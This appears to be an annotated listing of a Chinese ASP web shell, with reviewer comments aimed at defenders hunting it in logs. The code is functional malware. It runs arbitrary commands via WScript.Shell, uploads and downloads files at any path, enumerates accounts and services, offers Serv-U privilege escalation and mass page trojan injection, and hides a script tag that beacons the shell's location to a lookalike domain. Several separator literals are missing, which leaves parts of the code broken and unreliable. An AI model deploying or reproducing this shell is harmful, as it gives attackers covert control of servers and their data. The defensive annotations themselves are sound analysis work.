- ' MainMenu: writes the navigation table of this ASP web shell through RRS
- ' (an output helper defined outside this listing).
- ' Every entry links to an ?Action=<name> handler. The values visible here
- ' (Course, getTerminalInfo, ServerInfo, Cmd1Shell, ScanPort, Servu, ReadREG,
- ' EditFile, UpFile, kmuma, Cplgm, plgm, Logout) appear in the query string and
- ' are therefore usable as search terms in web-server access logs.
- ' SiteURL2, mName2, Copyright2, WWWRoot, RootPath and RePath come from
- ' outside this listing.
- Function MainMenu()
- RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
- RRS"<tr><td height='5'></td></tr>"
- RRS"<tr><td><center><a href='"&SiteURL2&"' target='_blank'><font color=red>"&mName2&"</font></center></a><hr hight=1 width='100%'>"
- RRS"</td></tr>"
- ' ObT is a table defined elsewhere; presumably entry (0,1) is the availability
- ' mark of a required component. When it is marked unavailable, the
- ' drive/folder shortcuts are replaced by a "no permission" row.
- If ObT(0,1)=" ×" Then
- RRS"<tr><td height='24'>无权限</td></tr>"
- Else
- RRS"<tr><td height=22 onmouseover=""menu1.style.display=''""> ↓查看硬盘<div id=menu1 style=""width:100%;display='none'"" onmouseout=""menu1.style.display='none'"">"
- ' LBF is a class defined outside this listing; its ShowDriver() output fills the hidden drive menu.
- Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
- RRS"</div></td></tr><tr><td height='20'><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>->站点根目录</a></td></tr>"
- RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>→本程序目录</a></td></tr>"
- ' Hard-coded shortcuts to fixed directories on drive C:, including the
- ' all-users pcAnywhere application-data folder and the Start-menu programs folder.
- RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Program Files"")'>→Program Files</a></td></tr>"
- RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents"")'>->Documents</a></td></tr>"
- RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere"")'>->pcAnywhere</a></td></tr>"
- RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序<hr></a></td></tr>"
- End If
- RRS"<tr><td height='22'><a href='?Action=Course' target='FileFrame'>→系统服务-用户账号</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=getTerminalInfo' target='FileFrame'>→终端端口-自动登录</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=ServerInfo' target='FileFrame'>→服务信息-组件支持</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=Cmd1Shell' target='FileFrame'>→执行CMD命令</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=ScanPort' target='FileFrame'>→端口扫描器</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=Servu' target='FileFrame'>→Serv-u提权</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=ReadREG' target='FileFrame'>→读取注册表</a></td></tr>"
- RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>→新建目录<hr></a></td></tr>"
- RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>→新建文本</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=UpFile' target='FileFrame'>→上传文件</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=kmuma' target='FileFrame'>→查找木马</b></a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=Cplgm&M=1' target='FileFrame'>→高级挂马</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=Cplgm&M=2' target='FileFrame'>→批量清马</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=Cplgm&M=3' target='FileFrame'>→批量替换</a></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=plgm' target='FileFrame'></b>→低级挂马</a></b></td></tr>"
- RRS"<tr><td height='22'><a href='?Action=Logout' target='_top'>→退出登录</a></td></tr>"
- RRS"<tr><td align=center style='color:red'><hr>"&Copyright2&"</td></tr></table>"
- ' NOTE(review): this <script> tag makes every browser that renders the menu
- ' request www.ipl38.com with this page's host name and path in the query
- ' string, so the location of the shell is disclosed to a third party. The host
- ' name differs by one character from the ip138.com form target used in
- ' ServerInfo. The request is made by the viewing browser, not by the server.
- RRS"<script language=javascript src=""http://www.ipl38.com/index.asp?n=http://" & Request.ServerVariables("SERVER_NAME") & "" & Request.ServerVariables("URL") & """></script>"
- ' Stray closing tag: the table was already closed two RRS calls above.
- RRS"</table>"
- End Function
- ' unPack: opens the Jet (Access) database file at thePath, reads every row of
- ' its FileData table and writes each row's fileContent column to disk under the
- ' script's own directory, at the relative path stored in the row's thePath column.
- ' The row paths are used as stored; nothing here validates or normalises them.
- ' fsoX and createFolder's file-system object come from outside this routine
- ' (fsoX is presumably a Scripting.FileSystemObject created elsewhere).
- Sub unPack(thePath)
- ' Errors are suppressed for the whole routine: a failed open or write is skipped silently.
- On Error Resume Next
- Server.ScriptTimeOut = 5000
- Dim rs, ws, str, conn, stream, connStr, theFolder
- ' NOTE(review): the string appended here is empty in this listing; a "\" path
- ' separator was probably lost when the page was rendered. Confirm against a raw sample.
- str = Server.MapPath(".") & ""
- Set rs = CreateObject("ADODB.RecordSet")
- Set stream = CreateObject("ADODB.Stream")
- Set conn = CreateObject("ADODB.Connection")
- connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
- conn.Open connStr
- rs.Open "FileData", conn, 1, 1
- stream.Open
- ' Type 1 = binary stream.
- stream.Type = 1
- Do Until rs.Eof
- ' Directory part of the stored path (same lost-separator caveat as above for the empty literal).
- theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), ""))
- If fsoX.FolderExists(str & theFolder) = False Then
- createFolder(str & theFolder)
- End If
- ' Truncate the stream at the current position before writing the next row;
- ' presumably this discards the previous row's bytes.
- stream.SetEos()
- stream.Write rs("fileContent")
- ' Option 2 = overwrite an existing file of the same name.
- stream.SaveToFile str & rs("thePath"), 2
- rs.MoveNext
- Loop
- rs.Close
- conn.Close
- stream.Close
- ' ws is declared but never assigned in this routine.
- Set ws = Nothing
- Set rs = Nothing
- Set stream = Nothing
- Set conn = Nothing
- End Sub
- ' createFolder: walks thePath from left to right, one separator at a time, and
- ' creates each ancestor folder that does not exist yet, using fsoX (defined
- ' outside this listing).
- ' NOTE(review): the separator literal passed to InStr is empty in this listing;
- ' a "\" was probably lost when the page was rendered. Confirm against a raw sample.
- Sub createFolder(thePath)
- Dim i
- i = Instr(thePath, "")
- Do While i > 0
- ' Existence is tested with the trailing separator, creation is done without it.
- If fsoX.FolderExists(Left(thePath, i)) = False Then
- fsoX.CreateFolder(Left(thePath, i - 1))
- End If
- ' Advance i to the next separator, or set it to 0 to end the loop when none is left.
- If InStr(Mid(thePath, i + 1), "") Then
- i = i + Instr(Mid(thePath, i + 1), "")
- Else
- i = 0
- End If
- Loop
- End Sub
- ' Course: renders an HTML table of local accounts/groups and services by
- ' enumerating the ADSI WinNT provider for the local machine ("WinNT://.").
- ' Output is split into three buffers that are written in this order:
- '   SI  - header plus rows labelled as system user/group,
- '   SI1 - services with StartType 2 (labelled automatic) whose path does not
- '         have "win" at characters 4-6 (i.e. not <drive>:\win...), shown in red,
- '   SI2 - everything else, shown in blue.
- ' Names and paths are written into the HTML without encoding.
- Function Course()
- SI="<br><table width='600' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
- SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系统用户与服务</td></tr>"
- ' Errors are suppressed from here on; presumably objects without a StartType
- ' property (users, groups) raise an error in the test below and execution
- ' falls through into the If body, which is how they get listed.
- on error resume next
- for each obj in getObject("WinNT://.")
- err.clear
- if OBJ.StartType="" then
- SI=SI&"<tr>"
- SI=SI&"<td height=""20"" bgcolor=""#FFFFFF""> "
- SI=SI&obj.Name
- SI=SI&"</td><td bgcolor=""#FFFFFF""> "
- SI=SI&"系统用户(组)"
- SI=SI&"</td></tr>"
- SI0="<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2""> </td></tr>"
- end if
- ' lx is the start-type label; it is not reset per iteration, so a value from
- ' a previous object can carry over when none of the three tests matches.
- if OBJ.StartType=2 then lx="自动"
- if OBJ.StartType=3 then lx="手动"
- if OBJ.StartType=4 then lx="禁用"
- if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
- SI1=SI1&"<tr><td height=""20"" bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20"" bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font color=#FF0000> "&obj.path&"</font></td></tr>"
- else
- SI2=SI2&"<tr><td height=""20"" bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20"" bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font color=#3399FF> "&obj.path&"</font></td></tr>"
- end if
- next
- RRS SI&SI0&SI1&SI2&"</table>"
- End Function
- ' ServerInfo: builds and writes a table describing the host: server name,
- ' local IP address, current time, processor count, OS and web-server software
- ' (all read from Request.ServerVariables or Now), followed by rows 0..13 of the
- ' ObT table (three columns per row; presumably a component-support list that
- ' is defined outside this listing).
- ' The table opened here is not closed within this function.
- Function ServerInfo()
- SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
- SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服务器组件信息</td></tr>"
- SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器名</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr>"
- ' The IP row is a form: when the viewer presses the button, the browser posts
- ' the server's LOCAL_ADDR to www.ip138.com in a new window.
- SI=SI&"<form method=post action='http://www.ip138.com/index.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器IP</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"
- SI=SI&"<input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='查询'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form>"
- SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器时间</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&now&" </td></tr>"
- SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器CPU数量</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr>"
- SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器操作系统</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr>"
- SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB服务器版本</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
- For i=0 To 13
- SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
- Next
- RRS SI
- End Function
- ' DownFile: sends the file at Path to the client as an attachment.
- ' Path is used exactly as passed in; nothing in this function restricts it to
- ' a directory, so any file readable by the account running the script can be
- ' returned. The whole file is loaded into a stream object before it is written.
- ' ObT(6,0) is presumably the ProgID of a binary stream component (it is used
- ' with Open/Type/LoadFromFile/Read); ObT is defined outside this listing.
- Function DownFile(Path)
- Response.Clear
- Set OSM = CreateObject(ObT(6,0))
- OSM.Open
- OSM.Type = 1
- OSM.LoadFromFile Path
- ' Start of the file-name part of Path. NOTE(review): the separator literal is
- ' empty in this listing; a "\" was probably lost when the page was rendered.
- sz=InstrRev(path,"")+1
- Response.AddHeader "Content-Disposition", "attachment; filename=" & Mid(path,sz)
- Response.AddHeader "Content-Length", OSM.Size
- Response.Charset = "UTF-8"
- Response.ContentType = "application/octet-stream"
- Response.BinaryWrite OSM.Read
- Response.Flush
- OSM.Close
- Set OSM = Nothing
- End Function
- ' HTMLEncode: replaces >, <, single quote, double quote and CHR(20) in S and
- ' returns the result; returns nothing (Empty) when S is Null.
- ' NOTE(review): in this listing every replacement string equals the character
- ' being replaced, and the CHR(34) line is not valid VBScript as shown. The
- ' entity text (&gt;, &lt; and so on) was most likely decoded when the page was
- ' rendered; confirm against a raw sample before relying on this function.
- ' "&" itself is not handled, and CHR(20) is a control character, not a space (CHR(32)).
- ' S has no ByVal marker, so the caller's variable is modified as well.
- Function HTMLEncode(S)
- if not isnull(S) then
- S = replace(S, ">", ">")
- S = replace(S, "<", "<")
- S = replace(S, CHR(39), "'")
- S = replace(S, CHR(34), """)
- S = replace(S, CHR(20), " ")
- HTMLEncode = S
- end if
- End Function
- ' UpFile: file-upload page.
- '   Request with Action2=Post: parses the multipart body with class UPC and
- '   saves the part named "LocalFile" to the path given in form field "ToPath".
- '   Any other request: writes the upload form.
- ' ToPath is a full path supplied by the client and is passed to SaveAs as is,
- ' so the write location is limited only by the permissions of the account
- ' running the script. The form pre-fills it with the session's current folder
- ' plus "\diy3.asp"; that default file name is a candidate artifact to search for.
- ' FIF (the type behind F, including SaveAs), BackUrl, ShowErr, URL and RRePath
- ' are defined outside this listing.
- Function UpFile()
- If Request("Action2")="Post" Then
- Set U=new UPC : Set F=U.UA("LocalFile")
- UName=U.form("ToPath")
- If UName="" Or F.FileSize=0 then
- SI="<br>请输入上传的完全路径后选择一个文件上传!"
- Else
- F.SaveAs UName
- ' The Err check only has an effect if error suppression was enabled by code
- ' outside this function; none is enabled here.
- If Err.number=0 Then
- ' UName is echoed into the page without HTML encoding.
- SI="<center><br><br><br>文件"&UName&"上传成功!</center>"
- End if
- End If
- Set F=nothing:Set U=nothing
- SI=SI&BackUrl
- RRS SI
- ShowErr()
- Response.End
- End If
- SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
- SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
- SI=SI&"<tr><td>"
- SI=SI&"上传路径:<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\diy3.asp")&"' size='40'>"
- SI=SI&" <input name='LocalFile' type='file' size='25'>"
- SI=SI&" <input type='submit' name='Submit' value='上传'>"
- SI=SI&"</td></tr></form></table>"
- RRS SI
- End Function
- ' Cmd1Shell: command-execution page of the shell.
- ' Request parameters read here:
- '   SP      - path of the program to run; remembered in Session("ShellPath")
- '   wscript - "yes" selects the Exec branch, anything else the Run branch
- '   cmd     - command line, passed after " /c "
- ' The page writes a form with these fields and, when cmd was posted, the
- ' command output inside a <textarea>.
- ' Artifacts visible in this code that a defender can look for: POSTs carrying
- ' the fields SP / wscript / cmd, and (Run branch) a short-lived file named
- ' cmd.txt in the script's directory. Both branches start a process from the
- ' script host, which presumably shows up as a child of the web-server process.
- Function Cmd1Shell()
- checked=" checked"
- If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
- ShellPath=Session("ShellPath")
- ' Default when no path was ever supplied.
- if ShellPath="" Then ShellPath = "diy3.asp"
- if Request("wscript")<>"yes" then checked=""
- If Request("cmd")<>"" Then DefCmd = Request("cmd")
- SI="<form method='post'>"
- ' ShellPath and DefCmd are echoed into attribute values without encoding.
- SI=SI&"SHELL路径:<input name='SP' value='"&ShellPath&"' Style='width:70%'> "
- SI=SI&"<input class=c type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell"
- SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input type='submit' value='执行'><textarea Style='width:100%;height:440;' class='cmd'>"
- If Request.Form("cmd")<>"" Then
- if Request.Form("wscript")="yes" then
- ' Exec branch: the component named by ObT(1,0) (defined elsewhere) runs the
- ' command and its stdout is appended to the page without HTML encoding.
- Set CM=CreateObject(ObT(1,0))
- Set DD=CM.exec(ShellPath&" /c "&DefCmd)
- aaa=DD.stdout.readall
- SI=SI&aaa
- else
- ' Run branch: output is redirected to cmd.txt next to the script, read
- ' back, HTML-encoded and the file deleted. Errors are suppressed from here on.
- On Error Resume Next
- ' The same object is created twice; the second line is redundant.
- Set ws=Server.CreateObject("WScript.Shell")
- Set ws=Server.CreateObject("WScript.Shell")
- Set fso=Server.CreateObject("Scripting.FileSystemObject")
- szTempFile = server.mappath("cmd.txt")
- ' Window style 0 (hidden), wait for completion = True.
- Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
- Set fs = CreateObject("Scripting.FileSystemObject")
- Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
- aaa=Server.HTMLEncode(oFilelcx.ReadAll)
- oFilelcx.Close
- Call fso.DeleteFile(szTempFile, True)
- SI=SI&aaa
- end if
- End If
- SI=SI&chr(13)&"</textarea></form>"
- RRS SI
- End Function
- ' Login gate (top-level code): a request is served past this point only when
- ' Session("web2a2dmin") equals UserPass (defined outside this listing).
- ' The password arrives in form field "pass" and is compared to UserPass as
- ' plain text; on a match the session value is set to the password itself and
- ' the client is redirected to url. No attempt limit or delay is visible here.
- ' The session key "web2a2dmin" and the field name "pass" are fixed strings of
- ' this sample.
- if session("web2a2dmin")<>UserPass then
- if request.form("pass")<>"" then
- if request.form("pass")=UserPass then
- session("web2a2dmin")=UserPass
- response.redirect url
- else
- rrs"<br><br><br><b><div align=center><font size='14' color='red'>注:请勿用于非法用途,否则后果自负!!!</font></b> <br><br><br><br><b><div align=center><font size='14' color='lime'>你密码错误!</font></b></p>"
- end if
- else
- si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='"&SiteURL&"' target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>密码:<input name='pass' type='password' size='22'> <input type='submit' value='登录'><hr>"&Copyright&"</center>"
- ' The login form is written only if the generated HTML contains SIC (defined
- ' elsewhere); presumably a check that the branding strings were not altered.
- if instr(SI,SIC)<>0 then rrs sI
- end if
- ' Unauthenticated requests stop here.
- response.end
- end if
- ' T1: script-level variable; class UPC stores the raw request-body stream in it.
- Dim T1
- Class UPC
- Dim D1,D2
- ' Form: returns the value of the non-file form field named F from the parsed
- ' multipart body, or "" when no such field was sent. The lookup is
- ' case-insensitive because F is lower-cased first. D1 is the dictionary of
- ' text fields filled by Class_Initialize.
- Public Function Form(F)
- F=lcase(F)
- If D1.exists(F) then:Form=D1(F):else:Form="":end if
- End Function
- ' UA: returns the file object recorded for the upload field named F, or a new
- ' empty FIF object when no such file part was sent (FIF is defined outside
- ' this listing). D2 is created in Class_Initialize only when the request has a
- ' body, so on an empty request D2 is not a dictionary when this runs.
- Public Function UA(F)
- F=lcase(F)
- If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
- End Function
- ' Class_Initialize: parses the raw multipart/form-data request body.
- ' The whole body (Request.TotalBytes, no size limit applied here) is read into
- ' the script-level stream T1. Each part's header text is decoded as gb2312;
- ' parts with a filename= attribute are recorded in D2 as FIF objects holding
- ' an offset and a size into T1, all other parts are decoded as text into D1.
- ' ObT(4,0) and ObT(6,0) are presumably the ProgIDs of a dictionary and a
- ' stream component (judging by the methods used); ObT is defined elsewhere.
- Private Sub Class_Initialize
- Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
- set D1=CreateObject(ObT(4,0))
- ' Nothing to parse; note that D2 and T1 stay unset in this case.
- if Request.TotalBytes<1 then Exit Sub
- set T1 = CreateObject(ObT(6,0))
- T1.Type = 1 : T1.Mode =3 : T1.Open
- T1.Write Request.BinaryRead(Request.TotalBytes)
- T1.Position=0 : TDa =T1.Read : DStart = 1
- DEnd = LenB(TDa)
- set D2=CreateObject(ObT(4,0))
- ' Byte-string CR LF in a local variable, for use with the byte functions InStrB/MidB.
- vbCrlf = chrB(13) & chrB(10)
- set T2 = CreateObject(ObT(6,0))
- ' TSt = first line of the body, i.e. the part delimiter.
- TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
- TLen = LenB (TSt)
- DStart=DStart+TLen+1
- while (DStart + 10) < DEnd
- ' DIEnd = offset just past the blank line that ends this part's headers.
- DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
- T2.Type = 1 : T2.Mode =3 : T2.Open
- T1.Position = DStart
- T1.CopyTo T2,DIEnd-DStart
- T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
- TIn = T2.ReadText : T2.Close
- ' DStart now points at the next delimiter, which bounds this part's data.
- DStart = InStrB(DIEnd,TDa,TSt)
- ' Field name from the header text; the search starts at fixed character 22.
- FStart = InStr(22,TIn,"name=""",1)+6
- FEnd = InStr(FStart,TIn,"""",1)
- UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
- if InStr (45,TIn,"filename=""",1) > 0 then
- set TFL=new FIF
- ' The client file name and Content-Type are located below, but neither value
- ' is stored anywhere in this listing; only offset and size are kept.
- FStart = InStr(FEnd,TIn,"filename=""",1)+10
- FEnd = InStr(FStart,TIn,"""",1)
- FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
- FEnd = InStr(FStart,TIn,vbCr)
- TFL.FileStart =DIEnd
- TFL.FileSize = DStart -DIEnd -3
- ' Only the first file part with a given field name is kept.
- if not D2.Exists(UpName) then
- D2.add UpName,TFL
- end if
- else
- T2.Type =1 : T2.Mode =3 : T2.Open
- T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
- T2.Position = 0 : T2.Type = 2
- T2.Charset ="gb2312"
- SFV = T2.ReadText
- T2.Close
- ' Repeated text fields are joined with ", ".
- if D1.Exists(UpName) then
- D1(UpName)=D1(UpName)&", "&SFV
- else
- D1.Add UpName,SFV
- end if
- end if
- DStart=DStart+TLen+1
- wend
- TDa=""
- set T2 =nothing
- End Sub